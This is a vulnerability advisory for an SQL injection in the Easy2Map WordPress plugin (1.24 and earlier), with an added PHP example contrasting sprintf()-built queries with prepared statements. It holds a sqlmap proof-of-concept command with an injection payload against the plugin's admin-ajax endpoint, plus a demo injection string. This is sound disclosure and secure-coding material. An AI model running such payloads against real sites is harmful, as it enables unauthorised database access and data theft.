Easy2Map <= 1.24 - SQL Injection



Description
The Function.php file uses sprintf() to format the queries it sends to the database. sprintf() neither sanitises user input nor parameterises the query.
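The difference between a sprintf()-formatted query and a parameterised one, as an added example (not the plugin's code and not part of the original advisory). The maps table, its columns and both function names are hypothetical, and PDO with in-memory SQLite stands in for the WordPress database layer, where $wpdb->prepare() plays the same role as the prepared statement shown here.

```php
<?php
// Added example, not Easy2Map's code: table, column and function names are hypothetical.
// Uses constructed rows in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE maps (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO maps (id, name) VALUES (10, 'Office'), (11, 'Depot'), (12, 'Yard')");

// Weak pattern: sprintf() only pastes text into the statement. %s does no escaping,
// so a quote in $name closes the string literal and the remainder is parsed as SQL.
function save_name_sprintf(PDO $db, string $id, string $name): int
{
    $sql = sprintf("UPDATE maps SET name = '%s' WHERE id = %s", $name, $id);
    return $db->exec($sql); // number of rows changed
}

// Hardened pattern: validate the numeric field, then bind both values so the
// driver passes them as data and they can never alter the statement's structure.
function save_name_prepared(PDO $db, string $id, string $name): int
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('mapID must contain digits only');
    }
    $stmt = $db->prepare("UPDATE maps SET name = :name WHERE id = :id");
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$input = "Renamed' --"; // constructed input: a quote followed by an SQL comment marker

// sprintf() version: the comment swallows the WHERE clause, so the update is
// no longer limited to map 11. Run inside a transaction and roll it back.
$db->beginTransaction();
$changed = save_name_sprintf($db, '11', $input);
$db->rollBack();
printf("sprintf():  %d row(s) changed\n", $changed);

// Prepared version: only map 11 is touched and the input is stored verbatim.
$changed = save_name_prepared($db, '11', $input);
$stored  = $db->query("SELECT name FROM maps WHERE id = 11")->fetchColumn();
printf("prepared:   %d row(s) changed, name stored as: %s\n", $changed, $stored);
```

Comparing the two row counts is a quick regression check when reviewing a fix: the bound version must change exactly one row regardless of what the name field contains.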
Proof of Concept
$ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

Affects Plugin

Fixed in version 1.2.5
- Plugin closed

References

CVE 2015-4614
CVE 2015-4616
PacketStorm 132551
URL https://vapid.dhs.org/advisory.php?v=131
URL https://plugins.trac.wordpress.org/changeset/1191455/easy2map

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 4288
Verified No
WPVDB ID 8075

Timeline

Publicly Published 2015-06-08 (about 5 years ago)
Added 2015-07-05 (about 5 years ago)
Last Updated 2019-10-22 (9 months ago)
